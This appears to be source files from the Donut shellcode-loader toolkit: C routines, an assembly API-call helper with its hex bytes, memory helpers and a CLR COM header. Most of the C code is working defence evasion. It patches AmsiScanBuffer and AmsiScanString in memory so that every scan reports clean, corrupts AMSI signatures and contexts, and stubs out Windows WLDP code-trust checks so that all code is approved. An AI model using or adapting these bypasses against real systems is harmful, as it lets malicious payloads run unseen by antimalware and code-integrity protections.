25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | typedef enum _WLDP_HOST_ID { | |
32 | WLDP_HOST_ID_UNKNOWN = 0, | |
33 | WLDP_HOST_ID_GLOBAL = 1, | |
34 | WLDP_HOST_ID_VBA = 2, | |
35 | WLDP_HOST_ID_WSH = 3, | |
36 | WLDP_HOST_ID_POWERSHELL = 4, | |
37 | WLDP_HOST_ID_IE = 5, | |
38 | WLDP_HOST_ID_MSI = 6, | |
39 | WLDP_HOST_ID_MAX = 7 | |
40 | } WLDP_HOST_ID, *PWLDP_HOST_ID; | |
41 | ||
42 | typedef struct _WLDP_HOST_INFORMATION { | |
43 | DWORD dwRevision; | |
44 | WLDP_HOST_ID dwHostId; | |
45 | PCWSTR szSource; | |
46 | HANDLE hSource; | |
47 | } WLDP_HOST_INFORMATION, *PWLDP_HOST_INFORMATION; | |
48 | ||
49 | #if defined(BYPASS_AMSI_A) | |
50 | ||
51 | // fake function that always returns S_OK and AMSI_RESULT_CLEAN | |
52 | HRESULT WINAPI AmsiScanBufferStub( | |
53 | HAMSICONTEXT amsiContext, | |
54 | PVOID buffer, | |
55 | ULONG length, | |
56 | LPCWSTR contentName, | |
57 | HAMSISESSION amsiSession, | |
58 | AMSI_RESULT *result) | |
59 | { | |
60 | *result = AMSI_RESULT_CLEAN; | |
61 | return S_OK; | |
62 | } | |
63 | ||
64 | // This function is never called. It's simply used to calculate | |
65 | // the length of AmsiScanBufferStub above. | |
66 | // | |
67 | // The reason it performs a multiplication is because MSVC can identify | |
68 | // functions that perform the same operation and eliminate duplicates | |
69 | // from the compiled code. Null subroutines are eliminated. | |
70 | ||
71 | int AmsiScanBufferStubEnd(int a, int b) { | |
72 | return a * b; | |
73 | } | |
74 | ||
75 | // fake function that always returns S_OK and AMSI_RESULT_CLEAN | |
76 | HRESULT WINAPI AmsiScanStringStub( | |
77 | HAMSICONTEXT amsiContext, | |
78 | LPCWSTR string, | |
79 | LPCWSTR contentName, | |
80 | HAMSISESSION amsiSession, | |
81 | AMSI_RESULT *result) | |
82 | { | |
83 | *result = AMSI_RESULT_CLEAN; | |
84 | return S_OK; | |
85 | } | |
86 | ||
87 | int AmsiScanStringStubEnd(int a, int b) { | |
88 | return a + b; | |
89 | } | |
90 | ||
91 | BOOL DisableAMSI(PDONUT_INSTANCE inst) { | |
92 | HMODULE dll; | |
93 | DWORD len, op, t; | |
94 | LPVOID cs; | |
95 | ||
96 | // try load amsi. if unable, assume DLL doesn't exist | |
97 | // and return TRUE to indicate it's okay to continue | |
98 | dll = inst->api.LoadLibraryA(inst->amsi.s); | |
99 | if(dll == NULL) return TRUE; | |
100 | ||
101 | // resolve address of AmsiScanBuffer. if not found, | |
102 | // return FALSE because it should exist ... | |
103 | cs = inst->api.GetProcAddress(dll, inst->amsiScanBuf); | |
104 | if(cs == NULL) return FALSE; | |
105 | ||
106 | // calculate length of stub | |
107 | len = (ULONG_PTR)AmsiScanBufferStubEnd - | |
108 | (ULONG_PTR)AmsiScanBufferStub; | |
109 | ||
110 | DPRINT("Length of AmsiScanBufferStub is %" PRIi32 " bytes.", len); | |
111 | ||
112 | // check for negative length. this would only happen when | |
113 | // compiler decides to re-order functions. | |
114 | if((int)len < 0) return FALSE; | |
115 | ||
116 | // make the memory writeable. return FALSE on error | |
117 | if(!inst->api.VirtualProtect( | |
118 | cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE; | |
119 | ||
120 | DPRINT("Overwriting AmsiScanBuffer"); | |
121 | // over write with virtual address of stub | |
122 | Memcpy(cs, ADR(PCHAR, AmsiScanBufferStub), len); | |
123 | // set memory back to original protection | |
124 | inst->api.VirtualProtect(cs, len, op, &t); | |
125 | ||
126 | // resolve address of AmsiScanString. if not found, | |
127 | // return FALSE because it should exist ... | |
128 | cs = inst->api.GetProcAddress(dll, inst->amsiScanStr); | |
129 | if(cs == NULL) return FALSE; | |
130 | ||
131 | // calculate length of stub | |
132 | len = (ULONG_PTR)AmsiScanStringStubEnd - | |
133 | (ULONG_PTR)AmsiScanStringStub; | |
134 | ||
135 | DPRINT("Length of AmsiScanStringStub is %" PRIi32 " bytes.", len); | |
136 | ||
137 | // check for negative length. this would only happen when | |
138 | // compiler decides to re-order functions. | |
139 | if((int)len < 0) return FALSE; | |
140 | ||
141 | // make the memory writeable | |
142 | if(!inst->api.VirtualProtect( | |
143 | cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE; | |
144 | ||
145 | DPRINT("Overwriting AmsiScanString"); | |
146 | // over write with virtual address of stub | |
147 | Memcpy(cs, ADR(PCHAR, AmsiScanStringStub), len); | |
148 | // set memory back to original protection | |
149 | inst->api.VirtualProtect(cs, len, op, &t); | |
150 | ||
151 | return TRUE; | |
152 | } | |
153 | ||
154 | #elif defined(BYPASS_AMSI_B) | |
155 | ||
156 | BOOL DisableAMSI(PDONUT_INSTANCE inst) { | |
157 | HMODULE dll; | |
158 | PBYTE cs; | |
159 | DWORD i, op, t; | |
160 | BOOL disabled = FALSE; | |
161 | PDWORD Signature; | |
162 | ||
163 | // try load amsi. if unable to load, assume | |
164 | // it doesn't exist and return TRUE to indicate | |
165 | // it's okay to continue. | |
166 | dll = inst->api.LoadLibraryA(inst->amsi.s); | |
167 | if(dll == NULL) return TRUE; | |
168 | ||
169 | // resolve address of AmsiScanBuffer. if unable, return | |
170 | // FALSE because it should exist. | |
171 | cs = (PBYTE)inst->api.GetProcAddress(dll, inst->amsiScanBuf); | |
172 | if(cs == NULL) return FALSE; | |
173 | ||
174 | // scan for signature | |
175 | for(i=0;;i++) { | |
176 | Signature = (PDWORD)&cs[i]; | |
177 | // is it "AMSI"? | |
178 | if(*Signature == inst->amsi.w[0]) { | |
179 | // set memory protection for write access | |
180 | inst->api.VirtualProtect(cs, sizeof(DWORD), | |
181 | PAGE_EXECUTE_READWRITE, &op); | |
182 | ||
183 | // change signature | |
184 | *Signature++; | |
185 | ||
186 | // set memory back to original protection | |
187 | inst->api.VirtualProtect(cs, sizeof(DWORD), op, &t); | |
188 | disabled = TRUE; | |
189 | break; | |
190 | } | |
191 | } | |
192 | return disabled; | |
193 | } | |
194 | ||
195 | #elif defined(BYPASS_AMSI_C) | |
196 | ||
197 | // Attempt to find AMSI context in .data section of CLR.dll | |
198 | // Could also scan PEB.ProcessHeap for this.. | |
199 | // Disabling AMSI via AMSI context is based on idea by Matt Graeber | |
200 | // https://gist.github.com/mattifestation/ef0132ba4ae3cc136914da32a88106b9 | |
201 | ||
202 | BOOL DisableAMSI(PDONUT_INSTANCE inst) { | |
203 | LPVOID clr; | |
204 | BOOL disabled = FALSE; | |
205 | PIMAGE_DOS_HEADER dos; | |
206 | PIMAGE_NT_HEADERS nt; | |
207 | PIMAGE_SECTION_HEADER sh; | |
208 | DWORD i, j, res; | |
209 | PBYTE ds; | |
210 | MEMORY_BASIC_INFORMATION mbi; | |
211 | _PHAMSICONTEXT ctx; | |
212 | ||
213 | // get address of CLR.dll. if unable, this | |
214 | // probably isn't a dotnet assembly being loaded | |
215 | clr = inst->api.GetModuleHandleA(inst->clr); | |
216 | if(clr == NULL) return FALSE; | |
217 | ||
218 | dos = (PIMAGE_DOS_HEADER)clr; | |
219 | nt = RVA2VA(PIMAGE_NT_HEADERS, clr, dos->e_lfanew); | |
220 | sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + | |
221 | nt->FileHeader.SizeOfOptionalHeader); | |
222 | ||
223 | // scan all writeable segments while disabled == FALSE | |
224 | for(i = 0; | |
225 | i < nt->FileHeader.NumberOfSections && !disabled; | |
226 | i++) | |
227 | { | |
228 | // if this section is writeable, assume it's data | |
229 | if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) { | |
230 | // scan section for pointers to the heap | |
231 | ds = RVA2VA (PBYTE, clr, sh[i].VirtualAddress); | |
232 | ||
233 | for(j = 0; | |
234 | j < sh[i].Misc.VirtualSize - sizeof(ULONG_PTR); | |
235 | j += sizeof(ULONG_PTR)) | |
236 | { | |
237 | // get pointer | |
238 | ULONG_PTR ptr = *(ULONG_PTR*)&ds[j]; | |
239 | // query if the pointer | |
240 | res = inst->api.VirtualQuery((LPVOID)ptr, &mbi, sizeof(mbi)); | |
241 | if(res != sizeof(mbi)) continue; | |
242 | ||
243 | // if it's a pointer to heap or stack | |
244 | if ((mbi.State == MEM_COMMIT ) && | |
245 | (mbi.Type == MEM_PRIVATE ) && | |
246 | (mbi.Protect == PAGE_READWRITE)) | |
247 | { | |
248 | ctx = (_PHAMSICONTEXT)ptr; | |
249 | // check if it contains the signature | |
250 | if(ctx->Signature == inst->amsi.w[0]) { | |
251 | // corrupt it | |
252 | ctx->Signature++; | |
253 | disabled = TRUE; | |
254 | break; | |
255 | } | |
256 | } | |
257 | } | |
258 | } | |
259 | } | |
260 | return disabled; | |
261 | } | |
262 | ||
263 | #elif defined(BYPASS_AMSI_D) | |
264 | // This is where you may define your own AMSI bypass. | |
265 | // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_AMSI_C defined. | |
266 | ||
267 | BOOL DisableAMSI(PDONUT_INSTANCE inst) { | |
268 | ||
269 | } | |
270 | ||
271 | #endif | |
272 | ||
273 | #if defined(BYPASS_WLDP_A) | |
274 | ||
275 | // fake function that always returns S_OK and isApproved = TRUE | |
276 | HRESULT WINAPI WldpIsClassInApprovedListStub( | |
277 | REFCLSID classID, | |
278 | PWLDP_HOST_INFORMATION hostInformation, | |
279 | PBOOL isApproved, | |
280 | DWORD optionalFlags) | |
281 | { | |
282 | *isApproved = TRUE; | |
283 | return S_OK; | |
284 | } | |
285 | ||
286 | // make sure prototype is different from other null subroutines | |
287 | // to avoid duplication by MSVC | |
288 | int WldpIsClassInApprovedListStubEnd(int a, int b) { | |
289 | return a - b; | |
290 | } | |
291 | ||
292 | // fake function that always returns S_OK | |
293 | HRESULT WINAPI WldpQueryDynamicCodeTrustStub( | |
294 | HANDLE fileHandle, | |
295 | PVOID baseImage, | |
296 | ULONG ImageSize) | |
297 | { | |
298 | return S_OK; | |
299 | } | |
300 | ||
301 | int WldpQueryDynamicCodeTrustStubEnd(int a, int b) { | |
302 | return a / b; | |
303 | } | |
304 | ||
305 | BOOL DisableWLDP(PDONUT_INSTANCE inst) { | |
306 | HMODULE wldp; | |
307 | DWORD len, op, t; | |
308 | LPVOID cs; | |
309 | ||
310 | // try load wldp. if unable, assume DLL doesn't exist | |
311 | // and return TRUE to indicate it's okay to continue | |
312 | wldp = inst->api.LoadLibraryA(inst->wldp); | |
313 | if(wldp == NULL) return TRUE; | |
314 | ||
315 | // resolve address of WldpQueryDynamicCodeTrust | |
316 | // if not found, return FALSE because it should exist | |
317 | cs = inst->api.GetProcAddress(wldp, inst->wldpQuery); | |
318 | if(cs == NULL) return FALSE; | |
319 | ||
320 | // calculate length of stub | |
321 | len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd - | |
322 | (ULONG_PTR)WldpQueryDynamicCodeTrustStub; | |
323 | ||
324 | DPRINT("Length of WldpQueryDynamicCodeTrustStub is %" PRIi32 " bytes.", len); | |
325 | ||
326 | // check for negative length. this would only happen when | |
327 | // compiler decides to re-order functions. | |
328 | if((int)len < 0) return FALSE; | |
329 | ||
330 | // make the memory writeable. return FALSE on error | |
331 | if(!inst->api.VirtualProtect( | |
332 | cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE; | |
333 | ||
334 | // overwrite with virtual address of stub | |
335 | Memcpy(cs, ADR(PCHAR, WldpQueryDynamicCodeTrustStub), len); | |
336 | // set back to original protection | |
337 | inst->api.VirtualProtect(cs, len, op, &t); | |
338 | ||
339 | // resolve address of WldpIsClassInApprovedList | |
340 | // if not found, return FALSE because it should exist | |
341 | cs = inst->api.GetProcAddress(wldp, inst->wldpIsApproved); | |
342 | if(cs == NULL) return FALSE; | |
343 | ||
344 | // calculate length of stub | |
345 | len = (ULONG_PTR)WldpIsClassInApprovedListStubEnd - | |
346 | (ULONG_PTR)WldpIsClassInApprovedListStub; | |
347 | ||
348 | DPRINT("Length of WldpIsClassInApprovedListStub is %" PRIi32 " bytes.", len); | |
349 | ||
350 | // check for negative length. this would only happen when | |
351 | // compiler decides to re-order functions. | |
352 | if((int)len < 0) return FALSE; | |
353 | ||
354 | // make the memory writeable. return FALSE on error | |
355 | if(!inst->api.VirtualProtect( | |
356 | cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE; | |
357 | ||
358 | // overwrite with virtual address of stub | |
359 | Memcpy(cs, ADR(PCHAR, WldpIsClassInApprovedListStub), len); | |
360 | // set back to original protection | |
361 | inst->api.VirtualProtect(cs, len, op, &t); | |
362 | ||
363 | return TRUE; | |
364 | } | |
365 | #elif defined(BYPASS_WLDP_B) | |
366 | // This is where you may define your own WLDP bypass. | |
367 | // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_WLDP_B defined. | |
368 | ||
369 | BOOL DisableWLDP(PDONUT_INSTANCE inst) { | |
370 | ||
371 | } | |
372 | #endif |
0 | ; | |
1 | ; Copyright © 2019 TheWover, Odzhan. All Rights Reserved. | |
2 | ; | |
3 | ; Redistribution and use in source and binary forms, with or without | |
4 | ; modification, are permitted provided that the following conditions are | |
5 | ; met: | |
6 | ; | |
7 | ; 1. Redistributions of source code must retain the above copyright | |
8 | ; notice, this list of conditions and the following disclaimer. | |
9 | ; | |
10 | ; 2. Redistributions in binary form must reproduce the above copyright | |
11 | ; notice, this list of conditions and the following disclaimer in the | |
12 | ; documentation and/or other materials provided with the distribution. | |
13 | ; | |
14 | ; 3. The name of the author may not be used to endorse or promote products | |
15 | ; derived from this software without specific prior written permission. | |
16 | ; | |
17 | ; THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR | |
18 | ; IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED | |
19 | ; WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
20 | ; DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, | |
21 | ; INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES | |
22 | ; (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
23 | ; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) | |
24 | ; HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, | |
25 | ; STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN | |
26 | ; ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE | |
27 | ; POSSIBILITY OF SUCH DAMAGE. | |
28 | ; | |
29 | ; | |
30 | ; void call_api(FARPROC api, int param_cnt, WCHAR param[]); | |
31 | ||
32 | %define DONUT_MAX_PARAM 8 | |
33 | %define DONUT_MAX_NAME 256 | |
34 | ||
35 | struc HOME_SPACE | |
36 | ._rcx resq 1 | |
37 | ._rdx resq 1 | |
38 | ._r8 resq 1 | |
39 | ._r9 resq 1 | |
40 | endstruc | |
41 | ||
42 | struc _ds | |
43 | .hs: resq HOME_SPACE_size | |
44 | ||
45 | .arg4 resq 1 | |
46 | .arg5 resq 1 | |
47 | .arg6 resq 1 | |
48 | .arg7 resq 1 | |
49 | ||
50 | ._rdi resq 1 | |
51 | ._rsi resq 1 | |
52 | ._rbp resq 1 | |
53 | ._rbx resq 1 | |
54 | ._rsp resq 1 | |
55 | endstruc | |
56 | ||
57 | %ifndef BIN | |
58 | global call_api | |
59 | global _call_api | |
60 | %endif | |
61 | ||
62 | call_api: | |
63 | _call_api: | |
64 | bits 32 | |
65 | ||
66 | ; int3 | |
67 | ||
68 | xor eax, eax ; | |
69 | dec eax ; | |
70 | jns L2 ; if SF=0, goto x64 | |
71 | ||
72 | mov eax, [esp+ 4] ; eax = api address | |
73 | mov ecx, [esp+ 8] ; ecx = param_cnt | |
74 | mov edx, [esp+12] ; edx = params | |
75 | L1: | |
76 | push edx ; save params[i] on stack | |
77 | add edx, DONUT_MAX_NAME * 2 ; advance to next element | |
78 | sub ecx, 1 ; subtract one from param_cnt | |
79 | jnz L1 | |
80 | call eax ; call api | |
81 | ret | |
82 | ||
83 | L2: | |
84 | bits 64 | |
85 | ||
86 | sub rsp, ((_ds_size & -16) + 16) - 8 | |
87 | ||
88 | mov [rsp+_ds._rbp], rbp | |
89 | mov [rsp+_ds._rbx], rbx | |
90 | mov [rsp+_ds._rdi], rdi | |
91 | mov [rsp+_ds._rsi], rsi | |
92 | ||
93 | mov rsi, rsp ; rsi = rsp after allocation | |
94 | mov rdi, rcx ; rdi = api to call | |
95 | mov eax, DONUT_MAX_NAME * 2 | |
96 | ||
97 | mov rcx, r8 ; rcx = param[0] | |
98 | lea rdx, [rcx+rax] ; rdx = param[1] | |
99 | lea r8, [rdx+rax] ; r8 = param[2] | |
100 | lea r9, [r8+rax] ; r9 = param[3] | |
101 | ||
102 | lea rbx, [r9+rax] | |
103 | mov [rsp+_ds.arg4], rbx ; param[4] | |
104 | add rbx, rax | |
105 | mov [rsp+_ds.arg5], rbx ; param[5] | |
106 | add rbx, rax | |
107 | mov [rsp+_ds.arg6], rbx ; param[6] | |
108 | add rbx, rax | |
109 | mov [rsp+_ds.arg7], rbx ; param[7] | |
110 | call rdi | |
111 | ||
112 | mov rsp, rsi ; restore rsp after allocation | |
113 | mov rsi, [rsp+_ds._rsi] | |
114 | mov rdi, [rsp+_ds._rdi] | |
115 | mov rbx, [rsp+_ds._rbx] | |
116 | mov rbp, [rsp+_ds._rbp] | |
117 | ||
118 | add rsp, ((_ds_size & -16) + 16) - 8 | |
119 | ret | |
120 | ⏎ |
0 | ||
1 | unsigned int CALL_API_BIN[47]; | |
2 | ||
3 | CALL_API_BIN[0] = 0x7948C031; | |
4 | CALL_API_BIN[1] = 0x24448B1B; | |
5 | CALL_API_BIN[2] = 0x244C8B04; | |
6 | CALL_API_BIN[3] = 0x24548B08; | |
7 | CALL_API_BIN[4] = 0xC281520C; | |
8 | CALL_API_BIN[5] = 0x00000200; | |
9 | CALL_API_BIN[6] = 0x7501E983; | |
10 | CALL_API_BIN[7] = 0xC3D0FFF4; | |
11 | CALL_API_BIN[8] = 0x48EC8148; | |
12 | CALL_API_BIN[9] = 0x48000001; | |
13 | CALL_API_BIN[10] = 0x3024AC89; | |
14 | CALL_API_BIN[11] = 0x48000001; | |
15 | CALL_API_BIN[12] = 0x38249C89; | |
16 | CALL_API_BIN[13] = 0x48000001; | |
17 | CALL_API_BIN[14] = 0x2024BC89; | |
18 | CALL_API_BIN[15] = 0x48000001; | |
19 | CALL_API_BIN[16] = 0x2824B489; | |
20 | CALL_API_BIN[17] = 0x48000001; | |
21 | CALL_API_BIN[18] = 0x8948E689; | |
22 | CALL_API_BIN[19] = 0x0200B8CF; | |
23 | CALL_API_BIN[20] = 0x894C0000; | |
24 | CALL_API_BIN[21] = 0x148D48C1; | |
25 | CALL_API_BIN[22] = 0x048D4C01; | |
26 | CALL_API_BIN[23] = 0x0C8D4D02; | |
27 | CALL_API_BIN[24] = 0x1C8D4900; | |
28 | CALL_API_BIN[25] = 0x9C894801; | |
29 | CALL_API_BIN[26] = 0x00010024; | |
30 | CALL_API_BIN[27] = 0xC3014800; | |
31 | CALL_API_BIN[28] = 0x249C8948; | |
32 | CALL_API_BIN[29] = 0x00000108; | |
33 | CALL_API_BIN[30] = 0x48C30148; | |
34 | CALL_API_BIN[31] = 0x10249C89; | |
35 | CALL_API_BIN[32] = 0x48000001; | |
36 | CALL_API_BIN[33] = 0x8948C301; | |
37 | CALL_API_BIN[34] = 0x0118249C; | |
38 | CALL_API_BIN[35] = 0xD7FF0000; | |
39 | CALL_API_BIN[36] = 0x48F48948; | |
40 | CALL_API_BIN[37] = 0x2824B48B; | |
41 | CALL_API_BIN[38] = 0x48000001; | |
42 | CALL_API_BIN[39] = 0x2024BC8B; | |
43 | CALL_API_BIN[40] = 0x48000001; | |
44 | CALL_API_BIN[41] = 0x38249C8B; | |
45 | CALL_API_BIN[42] = 0x48000001; | |
46 | CALL_API_BIN[43] = 0x3024AC8B; | |
47 | CALL_API_BIN[44] = 0x48000001; | |
48 | CALL_API_BIN[45] = 0x0148C481; | |
49 | CALL_API_BIN[46] = 0x00C30000; |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #include <inttypes.h> | |
32 | #include <stddef.h> | |
33 | ||
34 | // functions to replace intrinsic C library functions | |
35 | ||
36 | // funnily enough, MSVC still tries to replace this | |
37 | // with memset hence the use of assembly.. | |
38 | void *Memset (void *ptr, int value, size_t num) { | |
39 | ||
40 | #ifdef _MSC_VER | |
41 | __stosb(ptr, value, num); | |
42 | #else | |
43 | unsigned char *p = (unsigned char*)ptr; | |
44 | ||
45 | while(num--) { | |
46 | *p = value; | |
47 | p++; | |
48 | } | |
49 | #endif | |
50 | return ptr; | |
51 | } | |
52 | ||
53 | void *Memcpy (void *destination, const void *source, size_t num) { | |
54 | unsigned char *out = (unsigned char*)destination; | |
55 | unsigned char *in = (unsigned char*)source; | |
56 | ||
57 | while(num--) { | |
58 | *out = *in; | |
59 | out++; in++; | |
60 | } | |
61 | return destination; | |
62 | } | |
63 | ||
64 | int Memcmp(const void *ptr1, const void *ptr2, size_t num) { | |
65 | register const unsigned char *s1 = (const unsigned char*)ptr1; | |
66 | register const unsigned char *s2 = (const unsigned char*)ptr2; | |
67 | ||
68 | while (num-- > 0) { | |
69 | if (*s1++ != *s2++) | |
70 | return s1[-1] < s2[-1] ? -1 : 1; | |
71 | } | |
72 | return 0; | |
73 | } |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef CLR_H | |
32 | #define CLR_H | |
33 | ||
34 | typedef struct _ICLRMetaHost ICLRMetaHost; | |
35 | typedef struct _ICLRRuntimeInfo ICLRRuntimeInfo; | |
36 | typedef struct _ICorRuntimeHost ICorRuntimeHost; | |
37 | typedef struct _ICorConfiguration ICorConfiguration; | |
38 | typedef struct _IGCThreadControl IGCThreadControl; | |
39 | typedef struct _IGCHostControl IGCHostControl; | |
40 | typedef struct _IDebuggerThreadControl IDebuggerThreadControl; | |
41 | typedef struct _AppDomain IAppDomain; | |
42 | typedef struct _Assembly IAssembly; | |
43 | typedef struct _Type IType; | |
44 | typedef struct _Binder IBinder; | |
45 | typedef struct _MethodInfo IMethodInfo; | |
46 | ||
47 | typedef void *HDOMAINENUM; | |
48 | ||
49 | typedef HRESULT ( __stdcall *CLRCreateInstanceFnPtr )( | |
50 | REFCLSID clsid, | |
51 | REFIID riid, | |
52 | LPVOID *ppInterface); | |
53 | ||
54 | typedef HRESULT ( __stdcall *CreateInterfaceFnPtr )( | |
55 | REFCLSID clsid, | |
56 | REFIID riid, | |
57 | LPVOID *ppInterface); | |
58 | ||
59 | ||
60 | typedef HRESULT ( __stdcall *CallbackThreadSetFnPtr )( void); | |
61 | ||
62 | typedef HRESULT ( __stdcall *CallbackThreadUnsetFnPtr )( void); | |
63 | ||
64 | typedef void ( __stdcall *RuntimeLoadedCallbackFnPtr )( | |
65 | ICLRRuntimeInfo *pRuntimeInfo, | |
66 | CallbackThreadSetFnPtr pfnCallbackThreadSet, | |
67 | CallbackThreadUnsetFnPtr pfnCallbackThreadUnset); | |
68 | ||
69 | #undef DUMMY_METHOD | |
70 | #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This) | |
71 | ||
72 | typedef struct _BinderVtbl { | |
73 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
74 | IBinder * This, | |
75 | /* [in] */ REFIID riid, | |
76 | /* [iid_is][out] */ void **ppvObject); | |
77 | ||
78 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
79 | IBinder * This); | |
80 | ||
81 | ULONG ( STDMETHODCALLTYPE *Release )( | |
82 | IBinder * This); | |
83 | ||
84 | DUMMY_METHOD(GetTypeInfoCount); | |
85 | DUMMY_METHOD(GetTypeInfo); | |
86 | DUMMY_METHOD(GetIDsOfNames); | |
87 | DUMMY_METHOD(Invoke); | |
88 | DUMMY_METHOD(ToString); | |
89 | DUMMY_METHOD(Equals); | |
90 | DUMMY_METHOD(GetHashCode); | |
91 | DUMMY_METHOD(GetType); | |
92 | DUMMY_METHOD(BindToMethod); | |
93 | DUMMY_METHOD(BindToField); | |
94 | DUMMY_METHOD(SelectMethod); | |
95 | DUMMY_METHOD(SelectProperty); | |
96 | DUMMY_METHOD(ChangeType); | |
97 | DUMMY_METHOD(ReorderArgumentArray); | |
98 | } BinderVtbl; | |
99 | ||
100 | typedef struct _Binder { | |
101 | BinderVtbl *lpVtbl; | |
102 | } Binder; | |
103 | ||
104 | #undef DUMMY_METHOD | |
105 | #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAppDomain *This) | |
106 | ||
107 | typedef struct _AppDomainVtbl { | |
108 | BEGIN_INTERFACE | |
109 | ||
110 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
111 | IAppDomain * This, | |
112 | /* [in] */ REFIID riid, | |
113 | /* [iid_is][out] */ void **ppvObject); | |
114 | ||
115 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
116 | IAppDomain * This); | |
117 | ||
118 | ULONG ( STDMETHODCALLTYPE *Release )( | |
119 | IAppDomain * This); | |
120 | ||
121 | DUMMY_METHOD(GetTypeInfoCount); | |
122 | DUMMY_METHOD(GetTypeInfo); | |
123 | DUMMY_METHOD(GetIDsOfNames); | |
124 | DUMMY_METHOD(Invoke); | |
125 | ||
126 | DUMMY_METHOD(ToString); | |
